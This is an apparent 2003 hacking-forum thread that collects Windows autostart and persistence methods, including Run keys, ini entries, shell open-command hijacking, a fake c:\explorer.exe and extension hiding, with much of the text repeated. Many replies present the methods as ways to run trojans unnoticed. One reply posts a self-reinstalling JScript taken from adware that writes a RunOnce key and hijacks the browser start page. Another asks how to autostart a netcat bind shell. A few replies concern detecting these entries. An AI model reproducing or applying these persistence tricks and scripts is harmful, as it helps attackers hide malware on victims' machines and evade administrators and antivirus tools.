All Known and Unknown Autostart Methods from TLSecurity.net
1. Autostart folder
Everything in here will restart.
C:\windows\start menu\programs\startup {english}
C:\windows\Menu Dיmarrer\Programmes\Dיmarrage {french}
This Autostart Directory is saved in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders Startup="C:\windows\start menu\programs\startup"
'So it could be easily changed by any program.
2. Win.ini
[windows]
load=file.exe
run=file.exe
3. System.ini [boot]
Shell=Explorer.exe file.exe
4. c:\windows\winstart.bat
'Note behaves like an usual BAT file. Used for copying deleting specific files. Autostarts
everytime
5. Registry
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
6. c:\windows\wininit.ini
'Often Used by Setup-Programs when the file exists it is run ONCE and then is deleted by windows
Example: (content of wininit.ini)
[Rename]
NUL=c:\windows\picture.exe
'This example sends c:\windows\picture.exe to NUL, which means that it is deleted. This
requires no interactivity with the user and runs totaly stealth.
7. Autoexec.bat
Starts everytime at Dos Level.
8. Registry Shell Spawning
[HKEY_CLASSES_ROOT\exefile\shell\open\command] @="\"%1\" %*"
[HKEY_CLASSES_ROOT\comfile\shell\open\command] @="\"%1\" %*"
[HKEY_CLASSES_ROOT\batfile\shell\open\command] @="\"%1\" %*"
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] @="\"%1\" %*"
[HKEY_CLASSES_ROOT\piffile\shell\open\command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] @="\"%1\" %*"
The key should have a value of Value "%1 %*", if this is changed to "server.exe %1 %*",
the server.exe is executed EVERYTIME an exe/pif/com/bat/hta is executed.
Known as Unkown Starting Method and is currently used by Subseven.
9. Icq Inet
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\test]
"Path"="test.exe"
"Startup"="c:\\test"
"Parameters"=""
"Enable"="Yes"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\
This key includes all the APPS which are executed IF ICQNET Detects an Internet Connection.
9. Misc Information
[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap]
@="Scrap object" "NeverShowExt"=""
The NeverShowExt key has the function to HIDE the real extension of the file (here) SHS.
This means if you rename a file as "Girl.jpg.shs" it displays as "Girl.jpg" in all programs
including Explorer.
Your registry should be full of NeverShowExt keys, simply delte the key to get the real
extension to show up.
taken from illmob's site !!!
10x man !!!
Full Version: All Ways To Auto Start An Exe !
10x man nice thing 
Putting a Trojan as C:\explorer.exe will execute it everytime the computer restarts.
very nice thanx
tks Axl for the list in order to help
tks dissolutions I will test it later !
tks dissolutions I will test it later !
| QUOTE (Axl @ Dec 8 2003, 09:05 PM) |
| All Known and Unknown Autostart Methods from TLSecurity.net |
Does anyone else find it rather strange that any of these methods are
considered 'unknown' ? It is not exactly a very exhaustive list
Perhaps they mean that these are all the techniques 'known' to be in use
by existing malware examined by TLSecurity (rather than all the methods
available) Oh, + a few that they haven't seen used in malware but are
common sense.
I notice simple techniques such as exebinding to (or chain-executing of)
legitimate common executables and a whole heap of other registry locations
are missing from the list. Similarly, all of the techniques seem to be aimed at
running an ARBITRARY binary without writing any additional code... obviously,
code DESIGNED to autorun could use still more methods.
Maybe this should have been billed as 'Top 10 simplest methods of autorunning
any binary' rather than 'All ways to run auto-start an exe' which it so obviously
isn't.
Sorry if I seem a bit picky. Misinformation is a dangerous thing. I'd hate for
any fellow members to wrongly sound the 'all clear' simply because they had
checked all the startup methods in this short list.
SG
Edit:
This is different from dissolutions post of c:\explorer.exe. If you patch it or replace this with a modified version it cannot be deleted. If it is deleted using the same methods to replace it, the user interface will fail to start. This is a modification to the interface not just a file just starting up.
The one I am talking about is located %systemroot%\explorer.exe, commonly the system root is C:\WINDOWS
This is different from dissolutions post of c:\explorer.exe. If you patch it or replace this with a modified version it cannot be deleted. If it is deleted using the same methods to replace it, the user interface will fail to start. This is a modification to the interface not just a file just starting up.
The one I am talking about is located %systemroot%\explorer.exe, commonly the system root is C:\WINDOWS
| QUOTE (SlippyG @ Dec 9 2003, 06:24 AM) |
| I notice simple techniques such as exebinding to (or chain-executing of) legitimate common executables and a whole heap of other registry locations |
That just reminded me of something.
If you file bind to explorer.exe, use a "patch" program that after patching gets deleted, or just straight up replace it; it will start up everytime. Explorer.exe is your user interface for windows, if you want to play with it in assembly as I have create a copy and have it replace it with the original before boot (Be sure to backup as well in case you mess something up). You can't modify explorer.exe while windows is running (You can inject the process with code though) so what you need to do is have it replaced on bootup. Play with autoexec.bat and config.sys
.You can also replace it manually by booting up in safe mode with command prompt and replacing the files.
There are also keys to load items with internet explorer or other browsers, since this is usually run within the day on most computers connected to the internet its sort of autostart method.
Then there are always the programs that start up automatically that the keys are in places you would never expect.
Very good tute!!!
Thxxxxx
Thxxxxx
thx for the useful info axl 
good tutz thks for pasting this info from illmob website!
guys there is other startup methods like runas service and the active setup startup method used by beast trojan and the policies way used also by beast trojan , and also putting a hex edited version of explorer.exe and editing the registry to point to it as the default windows shell
very useful this info
big thx
big thx
good tutz thks 
Try this program for viewing autostart information. I've used it regularly to track down trojan start methods without manually having to check each location:
I unleash just about every executable I find on boards like this to my sacrificial machine. It's always interesting to see who is trying to infect who.
Auto-start viewer:
http://www.diamondcs.com.au/downloads/asviewer.zip
Also take a look at sysinternals, they have a similar free tool
They are not all inclusive, but have a good amount of knonw start methods
I unleash just about every executable I find on boards like this to my sacrificial machine. It's always interesting to see who is trying to infect who.
Auto-start viewer:
http://www.diamondcs.com.au/downloads/asviewer.zip
Also take a look at sysinternals, they have a similar free tool
They are not all inclusive, but have a good amount of knonw start methods
Woooow ,
this is even more than "intresting" or "useful" .
This ist awesome , not just the silly autostart folder or common methods .
Many ways not every admin will notice .
this is even more than "intresting" or "useful" .
This ist awesome , not just the silly autostart folder or common methods .
Many ways not every admin will notice .
yow peeps ..
does every file in c:\documents and settings\admin\start menu\programs\startup\
always start when the PC is starting up? and does it run without having it installed first?
Greetingsz
does every file in c:\documents and settings\admin\start menu\programs\startup\
always start when the PC is starting up? and does it run without having it installed first?
Greetingsz
This is admin dir , not allusers dir !
thx it is very good !
th@nx 4 da nice methods.. knew all but one !
a good admiin will see changes in win.ini
not?
ah is there any command as msconfig for win2kpro ??
plz contact me
not?
ah is there any command as msconfig for win2kpro ??
plz contact me
is possibile to apply at the exe one or more attributes ?
For example execute an exe like nc.exe -L -p port -d -e cmd.exe
Is possibile with this method?
Sorry 4 my english and thx for the trik
For example execute an exe like nc.exe -L -p port -d -e cmd.exe
Is possibile with this method?
Sorry 4 my english and thx for the trik
| QUOTE (SlippyG @ Dec 9 2003, 06:24 AM) | ||
Does anyone else find it rather strange that any of these methods are considered 'unknown' ? It is not exactly a very exhaustive list Perhaps they mean that these are all the techniques 'known' to be in use by existing malware examined by TLSecurity (rather than all the methods available) Oh, + a few that they haven't seen used in malware but are common sense. I notice simple techniques such as exebinding to (or chain-executing of) legitimate common executables and a whole heap of other registry locations are missing from the list. Similarly, all of the techniques seem to be aimed at running an ARBITRARY binary without writing any additional code... obviously, code DESIGNED to autorun could use still more methods. Maybe this should have been billed as 'Top 10 simplest methods of autorunning any binary' rather than 'All ways to run auto-start an exe' which it so obviously isn't. Sorry if I seem a bit picky. Misinformation is a dangerous thing. I'd hate for any fellow members to wrongly sound the 'all clear' simply because they had checked all the startup methods in this short list. SG |
i totally agree with u , there is lotzzz of ways to run a file using registry ..
starting a file with using the registry is the best way in my opinion!
cause there a lots of n00b admins
black
cause there a lots of n00b admins
black
thx very cool
thank you
thank you
THX 4 this usefull info!
THX
toostrong
THX
toostrong
usefull indeed, thx for sharing those infos
big thx 
Very nice post, I've learned some new methods, thx
Thank's very nice job
here are some other methods and some more info on the ones allready listed:
All Known and (so called) Unknown Autostart Methods
1. Autostart folder
C:\windows\start menu\programs\startup {english}
C:\windows\Menu Démarrer\Programmes\Démarrage {french}
C:\windows\All Users\Menu Iniciar\Programas\Iniciar { Portuguese, Brasilian }
This Autostart Directory is saved in :
l [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders]
Startup="C:\windows\start menu\programs\startup"
l [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell
Folders]
Startup="C:\windows\start menu\programs\startup"
l [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\User Shell
Folders]
"Common Startup"="C:\windows\start menu\programs\startup"
l [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell
Folders]
"Common Startup"="C:\windows\start menu\programs\startup"
By setting it to anything other then C:\windows\start menu\programs\startup will lead to execution of
ALL and EVERY executable inside set directory.
2. Win.ini
[windows]
load=file.exe
run=file.exe
3. System.ini
[boot]
Shell=Explorer.exe file.exe
4. c:\windows\winstart.bat
Note behaves like an usual BAT file. Used for copying deleting specific files. Autostarts everytime.
5. Registry
l [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Whatever"="c:\runfolder\program.exe"
l [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
"Whatever"="c:\runfolder\program.exe"
l [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Whatever"="c:\runfolder\program.exe"
l [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Whatever"="c:\runfolder\program.exe"
l [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\000x]
"RunMyApp"="||notepad.exe"
The format is: "DllFileName|FunctionName|CommandLineArguements" -or- "||command
parameters"
Microsoft Windows 98 Microsoft
Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Microsoft Windows Millennium Edition
http://support.microsoft.com/support/kb/ar...s/Q232/5/09.ASP
l [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Whatever"="c:\runfolder\program.exe"
l [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Whatever"="c:\runfolder\program.exe"
6. c:\windows\wininit.ini
'Often Used by Setup-Programs when the file exists it is run ONCE and then is deleted by windows
Example content of wininit.ini :
[Rename]
NUL=c:\windows\picture.exe
' This example sends c:\windows\picture.exe to NUL, which means that it is being deleted. This
requires no interactivity with the user and runs totaly stealth.
7. Autoexec.bat
Starts everytime at Dos Level.
8. Registry Shell Spawning
[HKEY_CLASSES_ROOT\exefile\shell\open\command] @="%1" %*
[HKEY_CLASSES_ROOT\comfile\shell\open\command] @="%1" %*
[HKEY_CLASSES_ROOT\batfile\shell\open\command] @="%1" %*
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] @="%1" %* [HKEY_CLASSES_ROOT
\piffile\shell\open\command] @="%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] @="%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] @="%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] @="%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] @= "%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] @="%1" %*
The key should have a value of Value <"%1" %*>, if this is changed to <server.exe "%1 %*">, the
server.exe is executed EVERYTIME an exe/pif/com/bat/hta is executed.
Known as Unkown Starting Method and is currently used by Subseven.
9. Icq Inet
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\test]
"Path"="test.exe"
"Startup"="c:\\test"
"Parameters"=""
"Enable"="Yes"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\
This key includes all the APPS which are executed IF ICQNET Detects an Internet Connection.
10. Explorer start-up
Windows 95,98,ME
Explorer.exe ist started through a system.ini entry, the entry itself contains no path information so if
c:\explorer.exe exist it will be started instead of c:\$winpath\explorer.exe.
Windows NT/2000
The Windows Shell is the familiar desktop that's used for interacting with Windows. During system
startup, Windows NT 4.0 and Windows 2000 consult the "Shell" registry entry,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell, to
determine the name of the executable that should be loaded as the Shell.
By default, this value specifies Explorer.exe.
The problem has to do with the search order that occurs when system startup is in process.
Whenever a registry entry specifies the name of a code module, but does it using a relative path,
Windows initiates a search process to find the code. The search order is as follows:
l Search the current directory.
l If the code isn't found, search the directories specified in HKEY_LOCAL_MACHINE\SYSTEM
\CurrentControlSet\Control\Session Manager\Environment\Path, in the order in which they
are specified.
l If the code isn't found, search the directories specified in HKEY_CURRENT_USER
\Environment\Path, in the order in which they are specified.
More info : http://www.microsoft.com/technet/security/...in/fq00-052.asp
Patch : http://www.microsoft.com/technet/support/kb.asp?ID=269049
General :
If a trojan installs itself as c:\explorer no run keys or other start-up entries are needed. If c:\explorer.
exe is a corrupted file the user will be locked out of the system. Affects all windows version as of
today.
11. Active-X Component
l HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName
StubPath=C:\PathToFile\Filename.exe
Believe it or not, this does start filename.exe BEFORE the shell and any other Program normaly
started over the Run Keys.
Misc Information
[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] @="Scrap object"
"NeverShowExt"=""
The NeverShowExt key has the function to HIDE the real extension of the file (here) SHS. This
means if you rename a file as "Girl.jpg.shs" it displays as "Girl.jpg" in all programs including Explorer.
Your registry should be full of NeverShowExt keys, simply delete the key to get the real extension to
show up.
All Known and (so called) Unknown Autostart Methods
1. Autostart folder
C:\windows\start menu\programs\startup {english}
C:\windows\Menu Démarrer\Programmes\Démarrage {french}
C:\windows\All Users\Menu Iniciar\Programas\Iniciar { Portuguese, Brasilian }
This Autostart Directory is saved in :
l [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders]
Startup="C:\windows\start menu\programs\startup"
l [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell
Folders]
Startup="C:\windows\start menu\programs\startup"
l [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\User Shell
Folders]
"Common Startup"="C:\windows\start menu\programs\startup"
l [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell
Folders]
"Common Startup"="C:\windows\start menu\programs\startup"
By setting it to anything other then C:\windows\start menu\programs\startup will lead to execution of
ALL and EVERY executable inside set directory.
2. Win.ini
[windows]
load=file.exe
run=file.exe
3. System.ini
[boot]
Shell=Explorer.exe file.exe
4. c:\windows\winstart.bat
Note behaves like an usual BAT file. Used for copying deleting specific files. Autostarts everytime.
5. Registry
l [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Whatever"="c:\runfolder\program.exe"
l [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
"Whatever"="c:\runfolder\program.exe"
l [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Whatever"="c:\runfolder\program.exe"
l [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Whatever"="c:\runfolder\program.exe"
l [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\000x]
"RunMyApp"="||notepad.exe"
The format is: "DllFileName|FunctionName|CommandLineArguements" -or- "||command
parameters"
Microsoft Windows 98 Microsoft
Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Microsoft Windows Millennium Edition
http://support.microsoft.com/support/kb/ar...s/Q232/5/09.ASP
l [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Whatever"="c:\runfolder\program.exe"
l [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Whatever"="c:\runfolder\program.exe"
6. c:\windows\wininit.ini
'Often Used by Setup-Programs when the file exists it is run ONCE and then is deleted by windows
Example content of wininit.ini :
[Rename]
NUL=c:\windows\picture.exe
' This example sends c:\windows\picture.exe to NUL, which means that it is being deleted. This
requires no interactivity with the user and runs totaly stealth.
7. Autoexec.bat
Starts everytime at Dos Level.
8. Registry Shell Spawning
[HKEY_CLASSES_ROOT\exefile\shell\open\command] @="%1" %*
[HKEY_CLASSES_ROOT\comfile\shell\open\command] @="%1" %*
[HKEY_CLASSES_ROOT\batfile\shell\open\command] @="%1" %*
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] @="%1" %* [HKEY_CLASSES_ROOT
\piffile\shell\open\command] @="%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] @="%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] @="%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] @="%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] @= "%1" %*
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] @="%1" %*
The key should have a value of Value <"%1" %*>, if this is changed to <server.exe "%1 %*">, the
server.exe is executed EVERYTIME an exe/pif/com/bat/hta is executed.
Known as Unkown Starting Method and is currently used by Subseven.
9. Icq Inet
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\test]
"Path"="test.exe"
"Startup"="c:\\test"
"Parameters"=""
"Enable"="Yes"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\
This key includes all the APPS which are executed IF ICQNET Detects an Internet Connection.
10. Explorer start-up
Windows 95,98,ME
Explorer.exe ist started through a system.ini entry, the entry itself contains no path information so if
c:\explorer.exe exist it will be started instead of c:\$winpath\explorer.exe.
Windows NT/2000
The Windows Shell is the familiar desktop that's used for interacting with Windows. During system
startup, Windows NT 4.0 and Windows 2000 consult the "Shell" registry entry,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell, to
determine the name of the executable that should be loaded as the Shell.
By default, this value specifies Explorer.exe.
The problem has to do with the search order that occurs when system startup is in process.
Whenever a registry entry specifies the name of a code module, but does it using a relative path,
Windows initiates a search process to find the code. The search order is as follows:
l Search the current directory.
l If the code isn't found, search the directories specified in HKEY_LOCAL_MACHINE\SYSTEM
\CurrentControlSet\Control\Session Manager\Environment\Path, in the order in which they
are specified.
l If the code isn't found, search the directories specified in HKEY_CURRENT_USER
\Environment\Path, in the order in which they are specified.
More info : http://www.microsoft.com/technet/security/...in/fq00-052.asp
Patch : http://www.microsoft.com/technet/support/kb.asp?ID=269049
General :
If a trojan installs itself as c:\explorer no run keys or other start-up entries are needed. If c:\explorer.
exe is a corrupted file the user will be locked out of the system. Affects all windows version as of
today.
11. Active-X Component
l HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName
StubPath=C:\PathToFile\Filename.exe
Believe it or not, this does start filename.exe BEFORE the shell and any other Program normaly
started over the Run Keys.
Misc Information
[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] @="Scrap object"
"NeverShowExt"=""
The NeverShowExt key has the function to HIDE the real extension of the file (here) SHS. This
means if you rename a file as "Girl.jpg.shs" it displays as "Girl.jpg" in all programs including Explorer.
Your registry should be full of NeverShowExt keys, simply delete the key to get the real extension to
show up.
Some very nice info there. Thanks loads for sharing the info.
good work this will come in verry handy
greetz sorry for bad english!
this will come in verry handy greetz sorry for bad english!
yes nice infos
thx 4 sharing but i think the autoexec.bat only works with win98 and lower
thx 4 sharing but i think the autoexec.bat only works with win98 and lower
great info will come handy. i been using firedaemon for few months however its been giving some trobule lately with xp sp1. The info provided in past posts will be very usefuly
thanks
thanks
thanks for the info Axl!
Nice little tut there. Thanks for taking the time to post it...
Thanks for great info.
A great tutorial for programmers!
A great tutorial for programmers!
Thank you for a good info
| QUOTE (r00tless @ Dec 26 2003, 12:25 AM) |
| Thanks for great info. A great tutorial for programmers! |
and hackers
but really good, i 'll use it right know
aTa
thanks man, this was very usefull information.
here is a nice way to service a tool.
it won't show up in msconfig, cuz it always runs once.
make a file : "NAMEOFTHISFILE.js"
it won't show up in msconfig, cuz it always runs once.
make a file : "NAMEOFTHISFILE.js"
| CODE |
| var fso = new ActiveXObject("Scripting.FileSystemObject"); var tfolder = fso.GetSpecialFolder(0); var filepath = tfolder + "\\NAMEOFTHISFILE.js"; var Shell = new ActiveXObject("WScript.Shell"); Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath); Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url); |
everytime windows starts, the file wil run itself, and sets itself to run on the next startup.
by adding one line, you can let some other program start itelf up two.
(code taken from an adware on my system.
)undetected by antivirs and spywarescanners.
Greetz
I was wondering is there a way to write to the win.ini or the autoexec.bat file through a batch file? THis would be usefull in making simple trojans. THNX
Great post m8,
Love the scriptz..Esorone
Love the scriptz..Esorone
thanx for that nice information
tnx. very good post!
Thankx for the info dude nice work
Big thanx 4 this information i´ve been looked a long time for it...
Well a good Topic!
But something important is missed !
if Exe File is Defined as a Virtual File type with a CLSID in Registery then running each exe file runs our trojan
But Our trojan must accpet a parameter an Run that by exec api function
But something important is missed !
if Exe File is Defined as a Virtual File type with a CLSID in Registery then running each exe file runs our trojan
But Our trojan must accpet a parameter an Run that by exec api function
thanks man for the list! it will definatly help me out alot!
*puts this post into his favorites*
Keep up the good work
*puts this post into his favorites*
Keep up the good work
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
